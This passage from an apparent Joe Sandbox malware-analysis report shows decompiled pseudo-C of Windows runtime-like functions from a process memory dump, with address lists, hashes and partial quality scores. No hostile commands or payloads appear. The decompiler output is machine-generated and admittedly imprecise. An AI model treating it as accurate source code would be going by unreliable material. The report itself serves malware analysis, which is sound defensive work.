										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x037fe730
0x037fe736
0x037fe738
0x037fe73d
0x037fe73e
0x037fe740
0x037fe749
0x037fe765
0x037fe76a
0x037fe76b
0x037fe76c
0x037fe76d
0x037fe76e
0x037fe76f
0x037fe775
0x037fe777
0x037fe77e
0x0383b675
0x037fe784
0x037fe784
0x037fe789
0x037fe7a8
0x037fe7ac
0x037fe807
0x037fe7ae
0x037fe7ae
0x037fe7b1
0x037fe7b4
0x037fe7b9
0x037fe7c0
0x037fe7c4
0x037fe7ca
0x037fe7cc
0x00000000
0x037fe7d3
0x037fe7d6
0x00000000
0x00000000
0x037fe7ff
0x037fe802
0x00000000
0x00000000
0x037fe7f9
0x037fe7fc
0x00000000
0x00000000
0x037fe7f3
0x037fe7f6
0x00000000
0x00000000
0x037fe7ed
0x037fe7f0
0x00000000
0x00000000
0x037fe7e7
0x037fe7ea
0x00000000
0x00000000
0x0383b685
0x0383b688
0x00000000
0x00000000
0x0383b682
0x00000000
0x00000000
0x037fe7cc
0x037fe7d9
0x037fe7dc
0x037fe7de
0x037fe7de
0x037fe7ac
0x037fe7e4
0x037fe74b
0x037fe751
0x037fe759
0x037fe761
0x037fe761

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6fbe12cd157a1f4305bec6d6697956a766e96a62e868d251462f9728a68241
Instruction ID: 33fca430b8ceea7b07ab96920cb3a3d76eb7cc3e3fa59fa6da345d198dfbc98c
Opcode Fuzzy Hash: 8c6fbe12cd157a1f4305bec6d6697956a766e96a62e868d251462f9728a68241
Instruction Fuzzy Hash: 17318DB5A14249EFD744DF58C841B9AB7E8FB09310F14829AFA04CB751E631E980CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 037FBC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E037FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x38b6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E037E2280(0xd, 0x11b8f1a0);
				_t41 =  *0x38b60f8; // 0x0
				if(_t41 != 0) {
					 *0x38b60f8 =  *_t41;
					 *0x38b60fc =  *0x38b60fc + 0xffff;
				}
				E037DFFB0(_t41, 0x800, 0x11b8f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x38b60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L037E4620(0x38b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x38b6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x037fbc36
0x037fbc42
0x037fbc45
0x037fbc4a
0x037fbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x037fbc50
0x037fbc50
0x037fbc58
0x037fbc5a
0x037fbc60
0x00000000
0x00000000
0x0383a4f2
0x0383a4f6
0x00000000
0x00000000
0x00000000
0x0383a4fc
0x037fbc79
0x037fbc7e
0x037fbc86
0x037fbd16
0x037fbd20
0x037fbd20
0x037fbc8d
0x037fbc94
0x037fbcbd
0x037fbcca
0x037fbccb
0x037fbccc
0x037fbccd
0x037fbcce
0x037fbcd4
0x037fbcea
0x037fbcee
0x037fbcf2
0x037fbd00
0x037fbd04
0x00000000
0x037fbc96
0x037fbcab
0x037fbcaf
0x037fbd2c
0x037fbd2c
0x037fbd09
0x00000000
0x037fbd09
0x037fbcb1
0x037fbcb5
0x037fbcbb
0x00000000
0x00000000
0x00000000
0x037fbcbb

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edf9e4f4ded6f0ae69ebc31941bf0b121e981106f97e9d926748c08d074e0a6e
Instruction ID: c5886724d5fe6d8d8ce308dc89421d4cdfe1e3e05839abc9f21b4cd2f7e9d56c
Opcode Fuzzy Hash: edf9e4f4ded6f0ae69ebc31941bf0b121e981106f97e9d926748c08d074e0a6e
Instruction Fuzzy Hash: 9731AC36A00A169FCB11EF98D4807A673A8FF18311F0940B9EA45EB305FB74D90ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 037C9100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E037C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x389f6e8);
				E0381D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E038988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0381D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x38b86c0; // 0x31d07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x38b86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E037E2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E038988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0380AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x38bb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x38b84c0;
										if(_t69 >=  *0x38b84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03899063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E037C922A(_t82);
							_t53 = E037E7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03898B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x38b86c0; // 0x31d07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x38b86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x38b86bc;
										_t72 = 0x38b86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E037C9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x38b86c4;
									_t72 = 0x38b86c0;
									L18:
									E037F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x037c9100
0x037c9100
0x037c9100
0x037c9100
0x037c9102
0x037c9107
0x037c910c
0x037c9110
0x037c9115
0x037c9136
0x037c9143
0x038237e4
0x038237e4
0x037c9149
0x037c914e
0x037c914e
0x037c9117
0x037c911d
0x00000000
0x00000000
0x037c911f
0x037c9125
0x00000000
0x037c9151
0x037c9158
0x037c915d
0x037c9161
0x037c9168
0x03823715
0x00000000
0x037c916e
0x037c916e
0x037c9175
0x037c9177
0x037c917e
0x037c917f
0x037c9182
0x037c9182
0x037c9187
0x037c9187
0x037c918a
0x037c918d
0x037c918f
0x037c9192
0x037c9195
0x037c9198
0x037c9198
0x037c9198
0x037c919a
0x00000000
0x00000000
0x0382371f
0x03823721
0x03823727
0x0382372f
0x03823733
0x03823735
0x03823738
0x0382373b
0x0382373d
0x03823740
0x00000000
0x00000000
0x03823746
0x03823749
0x00000000
0x00000000
0x0382374f
0x03823751
0x00000000
0x00000000
0x03823757
0x03823759
0x0382375c
0x0382375c
0x0382375e
0x0382375e
0x03823761
0x03823764
0x00000000
0x00000000
0x03823766
0x03823768
0x038237a3
0x038237a3
0x038237a5
0x038237a7
0x038237ad
0x038237b0
0x038237b2
0x038237bc
0x038237c2
0x038237c2
0x038237b2
0x037c9187
0x037c9187
0x037c918a
0x037c918d
0x037c918f
0x037c9192
0x037c9195
0x00000000
0x037c9195
0x00000000
0x037c9187
0x0382376a
0x0382376a
0x0382376c
0x0382376c
0x0382376f
0x03823775
0x00000000
0x00000000
0x03823777
0x03823779
0x00000000
0x00000000
0x03823782
0x03823787
0x03823789
0x03823790
0x03823790
0x0382378b
0x0382378b
0x0382378b
0x03823792
0x03823795
0x03823795
0x03823798
0x03823798
0x0382379b
0x0382379b
0x037c91a3
0x037c91a9
0x037c91b0
0x037c91b4
0x037c91b4
0x037c91bb
0x037c91c0
0x037c91c5
0x037c91c7
0x038237da
0x037c91cd
0x037c91cd
0x037c91cd
0x037c91d2
0x037c91d5
0x037c9239
0x037c9239
0x037c91d7
0x037c91db
0x037c91e1
0x037c91e7
0x037c91fd
0x037c9203
0x037c921e
0x037c9223
0x00000000
0x037c9223
0x037c9205
0x037c9208
0x037c920c
0x037c9214
0x037c9214
0x037c91e9
0x037c91e9
0x037c91ee
0x037c91f3
0x037c91f3
0x037c91f3
0x037c91e7
0x00000000
0x037c91db
0x037c9187
0x037c9168

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a2c6bd1ae95a3fae5792b6604b9c1e816d8de33f1d1d818abb6494b1c5cd15
Instruction ID: b0eeb13255b2df5593be1ac6f56a1dc9cfd2a8e120c051ef8a7819a922ff1013
Opcode Fuzzy Hash: 08a2c6bd1ae95a3fae5792b6604b9c1e816d8de33f1d1d818abb6494b1c5cd15
Instruction Fuzzy Hash: 9431D675A107C5DFDB65DBA8C4497ACFBB5BB4A310F1C81DDC604AB241D374A980CB51

Uniqueness

Uniqueness Score: -1.00%

Function 037F1DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E037F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E037EF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L037E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E037EF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x037f1dc2
0x037f1dc5
0x037f1dc7
0x037f1dcc
0x037f1dce
0x037f1dd6
0x037f1ddf
0x037f1de0
0x037f1de1
0x037f1de5
0x037f1de8
0x037f1def
0x037f1df0
0x037f1df6
0x037f1df7
0x037f1dfe
0x037f1e1a
0x00000000
0x00000000
0x037f1e0b
0x037f1e12
0x037f1e12
0x037f1e00
0x037f1e00
0x037f1e05
0x037f1e1e
0x037f1e23
0x0383570f
0x03835713
0x00000000
0x00000000
0x03835719
0x03835719
0x037f1e2c
0x037f1e2d
0x037f1e2e
0x037f1e2f
0x037f1e31
0x037f1e32
0x037f1e35
0x037f1e3d
0x03835723
0x0383573d
0x0383573d
0x00000000
0x03835723
0x037f1e49
0x037f1e4e
0x037f1e4e
0x037f1e09
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: a3d11da2d51f8e7e93c1e6467899fcceca456b7d841b254065bb0d675f40da21
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 0521AE76A00218EFC721CF99CC84EABFBBDFF86655F554095EA019B310D630AE01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 037E0050 Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E037E0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x38bd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E037F9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0380B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03898A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E037F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x38bb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x037e0055
0x037e005d
0x037e0062
0x037e006c
0x037e006f
0x037e0074
0x037e007a
0x037e007a
0x037e0080
0x037e0080
0x037e0087
0x037e008d
0x037e008f
0x037e0093
0x037e0095
0x037e009b
0x037e00f8
0x037e00fb
0x037e00fc
0x037e00ff
0x037e0108
0x037e0108
0x037e00a2
0x037e00a6
0x037e00b3
0x037e00bc
0x037e00c5
0x037e00ca
0x0382c01e
0x00000000
0x00000000
0x0382c02d
0x037e00d5
0x037e00d9
0x0382c03d
0x0382c046
0x0382c046
0x037e00df
0x037e00e2
0x037e00ea
0x037e00ef
0x037e00f2
0x037e00f6
0x037e0111
0x037e0117
0x037e0117
0x00000000
0x037e00f6
0x037e00d0
0x037e00d0
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74d6ed51e2e3bb83108be9866f8dd519e1341fa15deca6566bb86a20f6cf5ee5
Instruction ID: 27a7aeb79f9260bac12132ffd7e48b128da6658d38ee6a7f214ccc9023414bb7
Opcode Fuzzy Hash: 74d6ed51e2e3bb83108be9866f8dd519e1341fa15deca6566bb86a20f6cf5ee5
Instruction Fuzzy Hash: 20318D35201B04CFD722CF29C844B9AB7E5FF89715F1845ADE596CBB90EB75A801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03846C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E03846C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E037E7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x38b7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L037E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0380F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E037E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03809AE0();
						_t23 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x03846c0a
0x03846c0f
0x03846c10
0x03846c13
0x03846c15
0x03846c19
0x03846c1c
0x03846c21
0x03846c28
0x03846c3a
0x03846c2a
0x03846c33
0x03846c33
0x03846c3f
0x03846c48
0x03846c4d
0x03846c60
0x03846c65
0x03846c69
0x03846c73
0x03846c79
0x03846c7f
0x03846c86
0x03846c90
0x03846c94
0x03846ca6
0x03846cb2
0x03846cbd
0x03846cbd
0x03846cc3
0x03846cc7
0x03846ccb
0x03846cd0
0x03846cd1
0x03846ce2
0x03846ce2
0x03846c69
0x03846ced

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af739f1ba4672eb9bfc7b4019eec772a51ecd71b1c94e8e09130bb268fca874
Instruction ID: e6d5e0d47cb63a96f2c05e243e76212be713e1cf5d326779c0a7bc24f4a695b1
Opcode Fuzzy Hash: 8af739f1ba4672eb9bfc7b4019eec772a51ecd71b1c94e8e09130bb268fca874
Instruction Fuzzy Hash: E8219F75A00648AFC715DFA8D844F6AB7B8FF49740F1440A9F904DBB91E634ED50CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 038090AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E038090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0381D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E037FE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L037E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0380F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E037FA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x038090af
0x038090b8
0x038090bb
0x038090bf
0x038090c2
0x038090c2
0x038090c8
0x038090cb
0x038090cd
0x038414d7
0x038414eb
0x038414eb
0x00000000
0x038414eb
0x038414db
0x038414e6
0x00000000
0x038414f2
0x038414e8
0x00000000
0x038414e8
0x038090d8
0x038090da
0x038090dd
0x038090e5
0x00000000
0x03809139
0x038090fa
0x038090fe
0x03809142
0x00000000
0x03809142
0x03809104
0x03809107
0x0380910b
0x03809110
0x03809118
0x03809147
0x03809148
0x0380914f
0x03809150
0x03809151
0x03809152
0x03809156
0x0380915d
0x03809160
0x03809168
0x0380916c
0x038091bc
0x038091be
0x00000000
0x038091be
0x0380916e
0x03809173
0x03809176
0x00000000
0x00000000
0x0380917c
0x03809180
0x038091b5
0x00000000
0x038091b5
0x03809182
0x03809185
0x03809189
0x00000000
0x00000000
0x0380918e
0x03809190
0x03809198
0x00000000
0x00000000
0x038091a0
0x00000000
0x038091ad
0x038091ad
0x038091b0
0x038091b1
0x00000000
0x03809185
0x0380911a
0x0380911c
0x0380911f
0x03809125
0x03809127
0x00000000

Memory Dump Source

